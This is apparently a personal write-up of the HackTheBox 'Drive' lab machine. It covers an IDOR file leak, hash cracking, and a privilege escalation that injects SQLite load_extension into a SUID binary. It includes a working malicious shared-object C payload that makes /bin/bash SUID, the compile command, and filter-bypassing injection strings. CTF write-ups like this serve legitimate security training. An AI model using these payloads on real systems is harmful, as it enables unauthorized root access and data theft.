HackTheBox | Drive

Overview

Drive is a hard HackTheBox machine featuring a file-sharing service vulnerable to IDOR, through which a plaintext password is obtained, leading to SSH access to the box. Encrypted database backups are discovered, which are unlocked using a hardcoded password exposed in a Gitea repository. Hashes within the backups are cracked, leading to access to another user on the system whom has access to a root-owned binary with the SUID bit set. The binary is reverse engineered and used to obtain a shell on the target.

Nmap

nmap -A -T4 10.129.141.150
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-15 08:53 EDT
Nmap scan report for 10.129.141.150
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 27:5a:9f:db:91:c3:16:e5:7d:a6:0d:6d:cb:6b:bd:4a (RSA)
|   256 9d:07:6b:c8:47:28:0d:f2:9f:81:f2:b8:c3:a6:78:53 (ECDSA)
|_  256 1d:30:34:9f:79:73:69:bd:f6:67:f3:34:3c:1f:f9:4e (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From the nmap output we see that we have two open ports (22 & 80) and one filtered port (3000).

I checked the web page at port 80 :

I created a user and logged in :

There is a lot of options that we can do (upload a file, reserve/unreserve a file…)

First I checked the file that we have already there created by admin (Welcome_to_Doodle_Grive!) :

I noticed the id of the file, I said since the admin’s post has an id of 100 maybe I can find other hidden files by fuzzing the file_id :

That was the case, I found 4 results that I am unauthorized to see with the getFileDetail method.

Then I uploaded a file and I see that I have more options that I can do :

I tried the other methods available on my files on the other files that I found before, and the block method does the thing, I can now read the content of those files :

And by fuzzing now with Intruder using the new method, I see that the response code is 200 now :

I found the credentials of the user martin :

I can also find the list of users by creating a group and editing it to add users :

Now I’m in as martin user :

User flag

Following what we saw in the file with id 101 : “the database will be automatically compressed and copied to /var/www/backups/ “. I saw four 7z files and one SQLite database file :

I copied all those files to my locale machine, and I tried to crack them but it was a dead end.

After turning around the machine looking for some hidden hints or passwords, I found a sus running service at port 3000 :

So I did port forwarding to see what’s there :

ssh -L 127.0.0.1:3000:127.0.0.1:3000 martin@10.129.48.20

I found that it’s running a Gitea service, where I found the password of the 7z files :

I cracked all the 7z files and dumped all the user hashes. The dec 7z file contains pbkdf2 hashes which I couldn’t crack. But other files contain sha1 hashes which I could successfully crack some of them !

hashcat.exe -a 0 -m 124 ../Desktop/hashes.txt rockyou.txt -O

I tried all the three password and only one of them worked, it was the one for the user tom :

Now I can read the user flag :

PE

In tom’s home directory, I found a binary file with SUID permissions :

The README.txt file contains a description about that binary :

When I tried to execute the binary, I was asked for some credentials which I don’t have so I checked strings of the file, and I found them there :

Now I can login to the app. I checked all the choices but only the 5th choice looks interesting, where I can activate a user account by providing a username :

While reverse engineering the binary I saw the query responsible for the activation of the user account :

So I said maybe I can inject some malicious input into the username and privesc. While I was looking for a way, I found that load_extension does the job.

load_extension in SQLite is used to load a SQLite extension module into the current SQLite database connection. SQLite extensions are shared objects that provide additional functionality.

So I can just create malicious shared object and give it to the load_extension which will load it to our SQLite database.

https://tbhaxor.com/exploiting-shared-library-misconfigurations

I created a C script which will add a SUID bit to /bin/bash, and transferred it to the machine :

#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/usr/bin/chmod u+s /bin/bash");
}

And then I can use gcc to compile our C script :

gcc -shared -fPIC -nostartfiles -o p.so p.c

https://stackoverflow.com/questions/6663124/how-to-load-extensions-into-sqlite

"+load_extension('./p')--"

In the first try that didn’t work because as we can see there is a filtering on the ‘/’ char :

So I thought about converting my string to ASCII code :

ASCII codes for the characters in the string ‘./p’ :

• ’.’ : ASCII code 46
• ’/’ : ASCII code 47
• ‘p’ : ASCII code 112

"+load_extension(char(46,47,112))--"

And yes it WORKED!

Now I’m ROOT, I can read the root flag :

MACHINE PWNED!

That was it, I hope you enjoyed the writeup. If you have any questions you can Contact Me.

Happy Hacking!

Hicham Ouardi

Cybersecurity Engineer | Offensive Security Intern

Tweet Share